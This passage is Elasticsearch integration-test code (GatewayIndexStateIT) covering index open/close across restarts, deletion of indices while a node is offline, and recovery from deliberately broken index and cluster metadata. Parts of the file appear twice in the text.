(IndexClosedException e) { // all is well } logger.info("--> opening index..."); client().admin().indices().prepareOpen("test").execute().actionGet(); logger.info("--> waiting for green status"); ensureGreen(); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.OPEN)); assertThat(stateResponse.getState().routingTable().index("test").shards().size(), equalTo(test.numPrimaries)); assertThat(stateResponse.getState().routingTable().index("test").shardsWithState(ShardRoutingState.STARTED).size(), equalTo(test.totalNumShards)); logger.info("--> trying to get the indexed document on the first round (before close and shutdown)"); getResponse = client().prepareGet("test", "1").execute().actionGet(); assertThat(getResponse.isExists(), equalTo(true)); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("2").setSource("field1", "value1").execute().actionGet(); } public void testJustMasterNode() throws Exception { logger.info("--> cleaning nodes"); logger.info("--> starting 1 master node non data"); internalCluster().startNode(nonDataNode()); logger.info("--> create an index"); client().admin().indices().prepareCreate("test").setWaitForActiveShards(ActiveShardCount.NONE).execute().actionGet(); logger.info("--> restarting master node"); internalCluster().fullRestart(new RestartCallback(){ @Override public Settings onNodeStopped(String nodeName) { return nonDataNode(); } }); logger.info("--> waiting for test index to be created"); ClusterHealthResponse health = client().admin().cluster().prepareHealth().setWaitForEvents(Priority.LANGUID).setIndices("test") .execute().actionGet(); assertThat(health.isTimedOut(), equalTo(false)); logger.info("--> verify we have an index"); ClusterStateResponse clusterStateResponse = 
client().admin().cluster().prepareState().setIndices("test").execute().actionGet(); assertThat(clusterStateResponse.getState().metadata().hasIndex("test"), equalTo(true)); } public void testJustMasterNodeAndJustDataNode() { logger.info("--> cleaning nodes"); logger.info("--> starting 1 master node non data"); internalCluster().startMasterOnlyNode(); internalCluster().startDataOnlyNode(); logger.info("--> create an index"); client().admin().indices().prepareCreate("test").execute().actionGet(); client().prepareIndex("test").setSource("field1", "value1").execute().actionGet(); } public void testTwoNodesSingleDoc() throws Exception { logger.info("--> cleaning nodes"); logger.info("--> starting 2 nodes"); internalCluster().startNodes(2); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value1").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); ClusterHealthResponse health = client().admin().cluster().prepareHealth().setWaitForEvents(Priority.LANGUID).setWaitForGreenStatus() .setWaitForNodes("2").execute().actionGet(); assertThat(health.isTimedOut(), equalTo(false)); logger.info("--> verify 1 doc in the index"); for (int i = 0; i < 10; i++) { assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); } logger.info("--> closing test index..."); assertAcked(client().admin().indices().prepareClose("test")); ClusterStateResponse stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> opening the index..."); client().admin().indices().prepareOpen("test").execute().actionGet(); logger.info("--> waiting for green status"); health = client().admin().cluster().prepareHealth().setWaitForEvents(Priority.LANGUID).setWaitForGreenStatus().setWaitForNodes("2") .execute().actionGet(); assertThat(health.isTimedOut(), equalTo(false)); logger.info("--> verify 1 doc in the index"); assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); for (int i = 0; i < 10; i++) { assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); } } /** * This test ensures that when an index deletion takes place while a node is offline, when that * node rejoins the cluster, it deletes the index locally instead of importing it as a dangling index. 
*/ public void testIndexDeletionWhenNodeRejoins() throws Exception { final String indexName = "test-index-del-on-node-rejoin-idx"; final int numNodes = 2; final List<String> nodes; logger.info("--> starting a cluster with " + numNodes + " nodes"); nodes = internalCluster().startNodes(numNodes, Settings.builder().put(IndexGraveyard.SETTING_MAX_TOMBSTONES.getKey(), randomIntBetween(10, 100)).build()); logger.info("--> create an index"); createIndex(indexName); logger.info("--> waiting for green status"); ensureGreen(); final String indexUUID = resolveIndex(indexName).getUUID(); logger.info("--> restart a random date node, deleting the index in between stopping and restarting"); internalCluster().restartRandomDataNode(new RestartCallback() { @Override public Settings onNodeStopped(final String nodeName) throws Exception { nodes.remove(nodeName); logger.info("--> stopped node[{}], remaining nodes {}", nodeName, nodes); assert nodes.size() > 0; final String otherNode = nodes.get(0); logger.info("--> delete index and verify it is deleted"); final Client client = client(otherNode); client.admin().indices().prepareDelete(indexName).execute().actionGet(); assertFalse(indexExists(indexName, client)); logger.info("--> index deleted"); return super.onNodeStopped(nodeName); } }); logger.info("--> wait until all nodes are back online"); client().admin().cluster().health(Requests.clusterHealthRequest().waitForEvents(Priority.LANGUID) .waitForNodes(Integer.toString(numNodes))).actionGet(); logger.info("--> waiting for green status"); ensureGreen(); logger.info("--> verify that the deleted index is removed from the cluster and not reimported as dangling by the restarted node"); assertFalse(indexExists(indexName)); assertBusy(() -> { final NodeEnvironment nodeEnv = internalCluster().getInstance(NodeEnvironment.class); try { assertFalse("index folder " + indexUUID + " should be deleted", nodeEnv.availableIndexFolders().contains(indexUUID)); } catch (IOException e) { logger.error("Unable to retrieve available index folders from the node", e); fail("Unable to retrieve available index folders from the node"); } }); } /** * This test really tests worst case scenario where we have a broken setting or any setting that prevents an index from being * allocated in our metadata that we recover. In that case we now have the ability to check the index on local recovery from disk * if it is sane and if we can successfully create an IndexService. This also includes plugins etc. 
*/ public void testRecoverBrokenIndexMetadata() throws Exception { logger.info("--> starting one node"); internalCluster().startNode(); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value1").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); if (usually()) { ensureYellow(); } else { internalCluster().startNode(); client().admin().cluster() .health(Requests.clusterHealthRequest() .waitForGreenStatus() .waitForEvents(Priority.LANGUID) .waitForNoRelocatingShards(true).waitForNodes("2")).actionGet(); } ClusterState state = client().admin().cluster().prepareState().get().getState(); final IndexMetadata metadata = state.getMetadata().index("test"); final IndexMetadata.Builder brokenMeta = IndexMetadata.builder(metadata).settings(Settings.builder().put(metadata.getSettings()) .put(IndexMetadata.SETTING_VERSION_CREATED, Version.CURRENT.minimumIndexCompatibilityVersion().id) // this is invalid but should be archived .put("index.similarity.BM25.type", "boolean") // this one is not validated ahead of time and breaks allocation .put("index.analysis.filter.myCollator.type", "icu_collation")); restartNodesOnBrokenClusterState(ClusterState.builder(state).metadata(Metadata.builder(state.getMetadata()).put(brokenMeta))); // check that the cluster does not keep reallocating shards assertBusy(() -> { final RoutingTable routingTable = client().admin().cluster().prepareState().get().getState().routingTable(); final IndexRoutingTable indexRoutingTable = routingTable.index("test"); assertNotNull(indexRoutingTable); for (IndexShardRoutingTable shardRoutingTable : indexRoutingTable) { assertTrue(shardRoutingTable.primaryShard().unassigned()); assertEquals(UnassignedInfo.AllocationStatus.DECIDERS_NO, shardRoutingTable.primaryShard().unassignedInfo().getLastAllocationStatus()); assertThat(shardRoutingTable.primaryShard().unassignedInfo().getNumFailedAllocations(), greaterThan(0)); } }, 60, TimeUnit.SECONDS); client().admin().indices().prepareClose("test").get(); state = client().admin().cluster().prepareState().get().getState(); assertEquals(IndexMetadata.State.CLOSE, state.getMetadata().index(metadata.getIndex()).getState()); assertEquals("boolean", state.getMetadata().index(metadata.getIndex()).getSettings().get("archived.index.similarity.BM25.type")); // try to open it with the broken setting - fail again! ElasticsearchException ex = expectThrows(ElasticsearchException.class, () -> client().admin().indices().prepareOpen("test").get()); assertEquals(ex.getMessage(), "Failed to verify index " + metadata.getIndex()); assertNotNull(ex.getCause()); assertEquals(IllegalArgumentException.class, ex.getCause().getClass()); assertEquals(ex.getCause().getMessage(), "Unknown filter type [icu_collation] for [myCollator]"); } /** * This test really tests worst case scenario where we have a missing analyzer setting. * In that case we now have the ability to check the index on local recovery from disk * if it is sane and if we can successfully create an IndexService. * This also includes plugins etc. 
*/ public void testRecoverMissingAnalyzer() throws Exception { logger.info("--> starting one node"); internalCluster().startNode(); prepareCreate("test").setSettings(Settings.builder() .put("index.analysis.analyzer.test.tokenizer", "standard") .put("index.number_of_shards", "1")) .setMapping("{\n" + " \"properties\": {\n" + " \"field1\": {\n" + " \"type\": \"text\",\n" + " \"analyzer\": \"test\"\n" + " }\n" + " }\n" + " }}").get(); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value one").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); if (usually()) { ensureYellow(); } else { internalCluster().startNode(); client().admin().cluster() .health(Requests.clusterHealthRequest() .waitForGreenStatus() .waitForEvents(Priority.LANGUID) .waitForNoRelocatingShards(true).waitForNodes("2")).actionGet(); } ClusterState state = client().admin().cluster().prepareState().get().getState(); final IndexMetadata metadata = state.getMetadata().index("test"); final IndexMetadata.Builder brokenMeta = IndexMetadata.builder(metadata).settings(metadata.getSettings() .filter((s) -> "index.analysis.analyzer.test.tokenizer".equals(s) == false)); restartNodesOnBrokenClusterState(ClusterState.builder(state).metadata(Metadata.builder(state.getMetadata()).put(brokenMeta))); // check that the cluster does not keep reallocating shards assertBusy(() -> { final RoutingTable routingTable = client().admin().cluster().prepareState().get().getState().routingTable(); final IndexRoutingTable indexRoutingTable = routingTable.index("test"); assertNotNull(indexRoutingTable); for (IndexShardRoutingTable shardRoutingTable : indexRoutingTable) { assertTrue(shardRoutingTable.primaryShard().unassigned()); assertEquals(UnassignedInfo.AllocationStatus.DECIDERS_NO, shardRoutingTable.primaryShard().unassignedInfo().getLastAllocationStatus()); assertThat(shardRoutingTable.primaryShard().unassignedInfo().getNumFailedAllocations(), greaterThan(0)); } }, 60, TimeUnit.SECONDS); client().admin().indices().prepareClose("test").get(); // try to open it with the broken setting - fail again! 
ElasticsearchException ex = expectThrows(ElasticsearchException.class, () -> client().admin().indices().prepareOpen("test").get()); assertEquals(ex.getMessage(), "Failed to verify index " + metadata.getIndex()); assertNotNull(ex.getCause()); assertEquals(MapperParsingException.class, ex.getCause().getClass()); assertThat(ex.getCause().getMessage(), containsString("analyzer [test] has not been configured in mappings")); } public void testArchiveBrokenClusterSettings() throws Exception { logger.info("--> starting one node"); internalCluster().startNode(); client().prepareIndex("test").setId("1").setSource("field1", "value1").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); if (usually()) { ensureYellow(); } else { internalCluster().startNode(); client().admin().cluster() .health(Requests.clusterHealthRequest() .waitForGreenStatus() .waitForEvents(Priority.LANGUID) .waitForNoRelocatingShards(true).waitForNodes("2")).actionGet(); } ClusterState state = client().admin().cluster().prepareState().get().getState(); final Metadata metadata = state.getMetadata(); final Metadata brokenMeta = Metadata.builder(metadata).persistentSettings(Settings.builder() .put(metadata.persistentSettings()).put("this.is.unknown", true) .put(ShardLimitValidator.SETTING_CLUSTER_MAX_SHARDS_PER_NODE.getKey(), "broken").build()).build(); restartNodesOnBrokenClusterState(ClusterState.builder(state).metadata(brokenMeta)); ensureYellow("test"); // wait for state recovery state = client().admin().cluster().prepareState().get().getState(); assertEquals("true", state.metadata().persistentSettings().get("archived.this.is.unknown")); assertEquals("broken", state.metadata().persistentSettings().get("archived." + ShardLimitValidator.SETTING_CLUSTER_MAX_SHARDS_PER_NODE.getKey())); // delete these settings client().admin().cluster().prepareUpdateSettings().setPersistentSettings(Settings.builder().putNull("archived.*")).get(); state = client().admin().cluster().prepareState().get().getState(); assertNull(state.metadata().persistentSettings().get("archived.this.is.unknown")); assertNull(state.metadata().persistentSettings().get("archived." + ShardLimitValidator.SETTING_CLUSTER_MAX_SHARDS_PER_NODE.getKey())); assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); } public void testHalfDeletedIndexImport() throws Exception { // It's possible for a 6.x node to add a tombstone for an index but not actually delete the index metadata from disk since that // deletion is slightly deferred and may race against the node being shut down; if you upgrade to 7.x when in this state then the // node won't start. 
final String nodeName = internalCluster().startNode(); createIndex("test", Settings.builder() .put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1) .put(IndexMetadata.SETTING_NUMBER_OF_REPLICAS, 0) .build()); ensureGreen("test"); final Metadata metadata = internalCluster().getInstance(ClusterService.class).state().metadata(); final Path[] paths = internalCluster().getInstance(NodeEnvironment.class).nodeDataPaths(); final String nodeId = client().admin().cluster().prepareNodesInfo(nodeName).clear().get().getNodes().get(0).getNode().getId(); writeBrokenMeta(metaStateService -> { for (final Path path : paths) { IOUtils.rm(path.resolve(PersistedClusterStateService.METADATA_DIRECTORY_NAME)); } metaStateService.writeGlobalState("test", Metadata.builder(metadata) // we remove the manifest file, resetting the term and making this look like an upgrade from 6.x, so must also reset the // term in the coordination metadata .coordinationMetadata(CoordinationMetadata.builder(metadata.coordinationMetadata()).term(0L).build()) // add a tombstone but do not delete the index metadata from disk .putCustom(IndexGraveyard.TYPE, IndexGraveyard.builder().addTombstone(metadata.index("test").getIndex()).build()).build()); NodeMetadata.FORMAT.writeAndCleanup(new NodeMetadata(nodeId, Version.CURRENT), paths); }); ensureGreen(); assertBusy(() -> assertThat(internalCluster().getInstance(NodeEnvironment.class).availableIndexFolders(), empty())); } private void writeBrokenMeta(CheckedConsumer<MetaStateService, IOException> writer) throws Exception { Map<String, MetaStateService> metaStateServices = Stream.of(internalCluster().getNodeNames()) .collect(Collectors.toMap(Function.identity(), nodeName -> internalCluster().getInstance(MetaStateService.class, nodeName))); internalCluster().fullRestart(new RestartCallback(){ @Override public Settings onNodeStopped(String nodeName) throws Exception { final MetaStateService metaStateService = metaStateServices.get(nodeName); writer.accept(metaStateService); return super.onNodeStopped(nodeName); } }); } private void restartNodesOnBrokenClusterState(ClusterState.Builder clusterStateBuilder) throws Exception { Map<String, PersistedClusterStateService> lucenePersistedStateFactories = Stream.of(internalCluster().getNodeNames()) .collect(Collectors.toMap(Function.identity(), nodeName -> internalCluster().getInstance(PersistedClusterStateService.class, nodeName))); final ClusterState clusterState = clusterStateBuilder.build(); internalCluster().fullRestart(new RestartCallback(){ @Override public Settings onNodeStopped(String nodeName) throws Exception { final PersistedClusterStateService lucenePersistedStateFactory = lucenePersistedStateFactories.get(nodeName); try (PersistedClusterStateService.Writer writer = lucenePersistedStateFactory.createWriter()) { writer.writeFullStateAndCommit(clusterState.term(), clusterState); } return super.onNodeStopped(nodeName); } }); } }
server/src/internalClusterTest/java/org/elasticsearch/gateway/GatewayIndexStateIT.java
/* * Licensed to Elasticsearch under one or more contributor * license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright * ownership. Elasticsearch licenses this file to you under * the Apache License, Version 2.0 (the "License"); you may * not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.elasticsearch.gateway; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.Version; import org.elasticsearch.action.admin.cluster.health.ClusterHealthResponse; import org.elasticsearch.action.admin.cluster.state.ClusterStateResponse; import org.elasticsearch.action.get.GetResponse; import org.elasticsearch.action.support.ActiveShardCount; import org.elasticsearch.client.Client; import org.elasticsearch.client.Requests; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.metadata.IndexGraveyard; import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.cluster.metadata.MappingMetadata; import org.elasticsearch.cluster.metadata.Metadata; import org.elasticsearch.cluster.routing.IndexRoutingTable; import org.elasticsearch.cluster.routing.IndexShardRoutingTable; import org.elasticsearch.cluster.routing.RoutingTable; import org.elasticsearch.cluster.routing.ShardRoutingState; import org.elasticsearch.cluster.routing.UnassignedInfo; import org.elasticsearch.cluster.service.ClusterService; import org.elasticsearch.common.Priority; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.xcontent.XContentFactory; import org.elasticsearch.env.NodeEnvironment; import org.elasticsearch.index.mapper.MapperParsingException; import org.elasticsearch.indices.IndexClosedException; import org.elasticsearch.indices.ShardLimitValidator; import org.elasticsearch.test.ESIntegTestCase; import org.elasticsearch.test.ESIntegTestCase.ClusterScope; import org.elasticsearch.test.ESIntegTestCase.Scope; import org.elasticsearch.test.InternalTestCluster.RestartCallback; import java.io.IOException; import java.nio.file.Path; import java.util.List; import java.util.Map; import java.util.concurrent.TimeUnit; import java.util.function.Function; import java.util.stream.Collectors; import java.util.stream.Stream; import static org.elasticsearch.action.support.WriteRequest.RefreshPolicy.IMMEDIATE; import static org.elasticsearch.index.query.QueryBuilders.matchAllQuery; import static org.elasticsearch.test.NodeRoles.nonDataNode; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertHitCount; import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThan; import static org.hamcrest.Matchers.notNullValue; @ClusterScope(scope = Scope.TEST, numDataNodes = 0) public class GatewayIndexStateIT extends ESIntegTestCase { private final Logger logger = 
LogManager.getLogger(GatewayIndexStateIT.class); @Override protected boolean addMockInternalEngine() { // testRecoverBrokenIndexMetadata replies on the flushing on shutdown behavior which can be randomly disabled in MockInternalEngine. return false; } public void testMappingMetadataParsed() throws Exception { logger.info("--> starting 1 nodes"); internalCluster().startNode(); logger.info("--> creating test index, with meta routing"); client().admin().indices().prepareCreate("test") .setMapping(XContentFactory.jsonBuilder().startObject().startObject("_doc").startObject("_routing") .field("required", true).endObject().endObject().endObject()) .execute().actionGet(); logger.info("--> verify meta _routing required exists"); MappingMetadata mappingMd = client().admin().cluster().prepareState().execute().actionGet().getState().metadata() .index("test").mapping(); assertThat(mappingMd.routingRequired(), equalTo(true)); logger.info("--> restarting nodes..."); internalCluster().fullRestart(); logger.info("--> waiting for yellow status"); ensureYellow(); logger.info("--> verify meta _routing required exists"); mappingMd = client().admin().cluster().prepareState().execute().actionGet().getState().metadata().index("test").mapping(); assertThat(mappingMd.routingRequired(), equalTo(true)); } public void testSimpleOpenClose() throws Exception { logger.info("--> starting 2 nodes"); internalCluster().startNodes(2); logger.info("--> creating test index"); createIndex("test"); NumShards test = getNumShards("test"); logger.info("--> waiting for green status"); ensureGreen(); ClusterStateResponse stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.OPEN)); assertThat(stateResponse.getState().routingTable().index("test").shards().size(), equalTo(test.numPrimaries)); assertThat(stateResponse.getState().routingTable().index("test").shardsWithState(ShardRoutingState.STARTED).size(), equalTo(test.totalNumShards)); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value1").get(); logger.info("--> closing test index..."); assertAcked(client().admin().indices().prepareClose("test")); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> verifying that the state is green"); ensureGreen(); logger.info("--> trying to index into a closed index ..."); try { client().prepareIndex("test").setId("1").setSource("field1", "value1").execute().actionGet(); fail(); } catch (IndexClosedException e) { // all is well } logger.info("--> creating another index (test2) by indexing into it"); client().prepareIndex("test2").setId("1").setSource("field1", "value1").execute().actionGet(); logger.info("--> verifying that the state is green"); ensureGreen(); logger.info("--> opening the first index again..."); assertAcked(client().admin().indices().prepareOpen("test")); logger.info("--> verifying that the state is green"); ensureGreen(); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.OPEN)); assertThat(stateResponse.getState().routingTable().index("test").shards().size(), 
equalTo(test.numPrimaries)); assertThat(stateResponse.getState().routingTable().index("test").shardsWithState(ShardRoutingState.STARTED).size(), equalTo(test.totalNumShards)); logger.info("--> trying to get the indexed document on the first index"); GetResponse getResponse = client().prepareGet("test", "1").execute().actionGet(); assertThat(getResponse.isExists(), equalTo(true)); logger.info("--> closing test index..."); assertAcked(client().admin().indices().prepareClose("test")); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> restarting nodes..."); internalCluster().fullRestart(); logger.info("--> waiting for two nodes and green status"); ensureGreen(); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> trying to index into a closed index ..."); try { client().prepareIndex("test").setId("1").setSource("field1", "value1").execute().actionGet(); fail(); } catch (IndexClosedException e) { // all is well } logger.info("--> opening index..."); client().admin().indices().prepareOpen("test").execute().actionGet(); logger.info("--> waiting for green status"); ensureGreen(); stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.OPEN)); assertThat(stateResponse.getState().routingTable().index("test").shards().size(), equalTo(test.numPrimaries)); assertThat(stateResponse.getState().routingTable().index("test").shardsWithState(ShardRoutingState.STARTED).size(), equalTo(test.totalNumShards)); logger.info("--> trying to get the indexed document on the first round (before close and shutdown)"); getResponse = client().prepareGet("test", "1").execute().actionGet(); assertThat(getResponse.isExists(), equalTo(true)); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("2").setSource("field1", "value1").execute().actionGet(); } public void testJustMasterNode() throws Exception { logger.info("--> cleaning nodes"); logger.info("--> starting 1 master node non data"); internalCluster().startNode(nonDataNode()); logger.info("--> create an index"); client().admin().indices().prepareCreate("test").setWaitForActiveShards(ActiveShardCount.NONE).execute().actionGet(); logger.info("--> restarting master node"); internalCluster().fullRestart(new RestartCallback(){ @Override public Settings onNodeStopped(String nodeName) { return nonDataNode(); } }); logger.info("--> waiting for test index to be created"); ClusterHealthResponse health = client().admin().cluster().prepareHealth().setWaitForEvents(Priority.LANGUID).setIndices("test") .execute().actionGet(); assertThat(health.isTimedOut(), equalTo(false)); logger.info("--> verify we have an index"); ClusterStateResponse clusterStateResponse = client().admin().cluster().prepareState().setIndices("test").execute().actionGet(); assertThat(clusterStateResponse.getState().metadata().hasIndex("test"), equalTo(true)); } public void testJustMasterNodeAndJustDataNode() { logger.info("--> cleaning nodes"); logger.info("--> starting 1 master node non 
data"); internalCluster().startMasterOnlyNode(); internalCluster().startDataOnlyNode(); logger.info("--> create an index"); client().admin().indices().prepareCreate("test").execute().actionGet(); client().prepareIndex("test").setSource("field1", "value1").execute().actionGet(); } public void testTwoNodesSingleDoc() throws Exception { logger.info("--> cleaning nodes"); logger.info("--> starting 2 nodes"); internalCluster().startNodes(2); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value1").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); ClusterHealthResponse health = client().admin().cluster().prepareHealth().setWaitForEvents(Priority.LANGUID).setWaitForGreenStatus() .setWaitForNodes("2").execute().actionGet(); assertThat(health.isTimedOut(), equalTo(false)); logger.info("--> verify 1 doc in the index"); for (int i = 0; i < 10; i++) { assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); } logger.info("--> closing test index..."); assertAcked(client().admin().indices().prepareClose("test")); ClusterStateResponse stateResponse = client().admin().cluster().prepareState().execute().actionGet(); assertThat(stateResponse.getState().metadata().index("test").getState(), equalTo(IndexMetadata.State.CLOSE)); assertThat(stateResponse.getState().routingTable().index("test"), notNullValue()); logger.info("--> opening the index..."); client().admin().indices().prepareOpen("test").execute().actionGet(); logger.info("--> waiting for green status"); health = client().admin().cluster().prepareHealth().setWaitForEvents(Priority.LANGUID).setWaitForGreenStatus().setWaitForNodes("2") .execute().actionGet(); assertThat(health.isTimedOut(), equalTo(false)); logger.info("--> verify 1 doc in the index"); assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); for (int i = 0; i < 10; i++) { assertHitCount(client().prepareSearch().setQuery(matchAllQuery()).get(), 1L); } } /** * This test ensures that when an index deletion takes place while a node is offline, when that * node rejoins the cluster, it deletes the index locally instead of importing it as a dangling index. 
*/ public void testIndexDeletionWhenNodeRejoins() throws Exception { final String indexName = "test-index-del-on-node-rejoin-idx"; final int numNodes = 2; final List<String> nodes; logger.info("--> starting a cluster with " + numNodes + " nodes"); nodes = internalCluster().startNodes(numNodes, Settings.builder().put(IndexGraveyard.SETTING_MAX_TOMBSTONES.getKey(), randomIntBetween(10, 100)).build()); logger.info("--> create an index"); createIndex(indexName); logger.info("--> waiting for green status"); ensureGreen(); final String indexUUID = resolveIndex(indexName).getUUID(); logger.info("--> restart a random date node, deleting the index in between stopping and restarting"); internalCluster().restartRandomDataNode(new RestartCallback() { @Override public Settings onNodeStopped(final String nodeName) throws Exception { nodes.remove(nodeName); logger.info("--> stopped node[{}], remaining nodes {}", nodeName, nodes); assert nodes.size() > 0; final String otherNode = nodes.get(0); logger.info("--> delete index and verify it is deleted"); final Client client = client(otherNode); client.admin().indices().prepareDelete(indexName).execute().actionGet(); assertFalse(indexExists(indexName, client)); logger.info("--> index deleted"); return super.onNodeStopped(nodeName); } }); logger.info("--> wait until all nodes are back online"); client().admin().cluster().health(Requests.clusterHealthRequest().waitForEvents(Priority.LANGUID) .waitForNodes(Integer.toString(numNodes))).actionGet(); logger.info("--> waiting for green status"); ensureGreen(); logger.info("--> verify that the deleted index is removed from the cluster and not reimported as dangling by the restarted node"); assertFalse(indexExists(indexName)); assertBusy(() -> { final NodeEnvironment nodeEnv = internalCluster().getInstance(NodeEnvironment.class); try { assertFalse("index folder " + indexUUID + " should be deleted", nodeEnv.availableIndexFolders().contains(indexUUID)); } catch (IOException e) { logger.error("Unable to retrieve available index folders from the node", e); fail("Unable to retrieve available index folders from the node"); } }); } /** * This test really tests worst case scenario where we have a broken setting or any setting that prevents an index from being * allocated in our metadata that we recover. In that case we now have the ability to check the index on local recovery from disk * if it is sane and if we can successfully create an IndexService. This also includes plugins etc. 
*/ public void testRecoverBrokenIndexMetadata() throws Exception { logger.info("--> starting one node"); internalCluster().startNode(); logger.info("--> indexing a simple document"); client().prepareIndex("test").setId("1").setSource("field1", "value1").setRefreshPolicy(IMMEDIATE).get(); logger.info("--> waiting for green status"); if (usually()) { ensureYellow(); } else { internalCluster().startNode(); client().admin().cluster() .health(Requests.clusterHealthRequest() .waitForGreenStatus() .waitForEvents(Priority.LANGUID) .waitForNoRelocatingShards(true).waitForNodes("2")).actionGet(); } ClusterState state = client().admin().cluster().prepareState().get().getState(); final IndexMetadata metadata = state.getMetadata().index("test"); final IndexMetadata.Builder brokenMeta = IndexMetadata.builder(metadata).settings(Settings.builder().put(metadata.getSettings()) .put(IndexMetadata.SETTING_VERSION_CREATED, Version.CURRENT.minimumIndexCompatibilityVersion().id) // this is invalid but should be archived .put("index.similarity.BM25.type", "boolean") // this one is not validated ahead of time and breaks allocation .put("index.analysis.filter.myCollator.type", "icu_collation")); restartNodesOnBrokenClusterState(ClusterState.builder(state).metadata(Metadata.builder(state.getMetadata()).put(brokenMeta))); // check that the cluster does not keep reallocating shards assertBusy(() -> { final RoutingTable routingTable = client().admin().cluster().prepareState().get().getState().routingTable(); final IndexRoutingTable indexRoutingTable = routingTable.index("test"); assertNotNull(indexRoutingTable); for (IndexShardRoutingTable shardRoutingTable : indexRoutingTable) { assertTrue(shardRoutingTable.primaryShard().unassigned()); assertEquals(UnassignedInfo.AllocationStatus.DECIDERS_NO, shardRoutingTable.primaryShard().unassignedInfo().getLastAllocationStatus()); assertThat(shardRoutingTable.primaryShard().unassignedInfo().getNumFailedAllocations(), greaterThan(0)); } }, 60, TimeUnit.SECONDS); client().admin().indices().prepareClose("test").get(); state = client().admin().cluster().prepareState().get().getState(); assertEquals(IndexMetadata.State.CLOSE, state.getMetadata().index(metadata.getIndex()).getState()); assertEquals("boolean", state.getMetadata().index(metadata.getIndex()).getSettings().get("archived.index.similarity.BM25.type")); // try to open it with the broken setting - fail again! ElasticsearchException ex = expectThrows(ElasticsearchException.class, () -> client().admin().indices().prepareOpen("test").get()); assertEquals(ex.getMessage(), "Failed to verify index " + metadata.getIndex()); assertNotNull(ex.getCause()); assertEquals(IllegalArgumentException.class, ex.getCause().getClass()); assertEquals(ex.getCause().getMessage(), "Unknown filter type [icu_collation] for [myCollator]"); } /** * This test really tests worst case scenario where we have a missing analyzer setting. * In that case we now have the ability to check the index on local recovery from disk * if it is sane and if we can successfully create an IndexService. * This also includes plugins etc. 
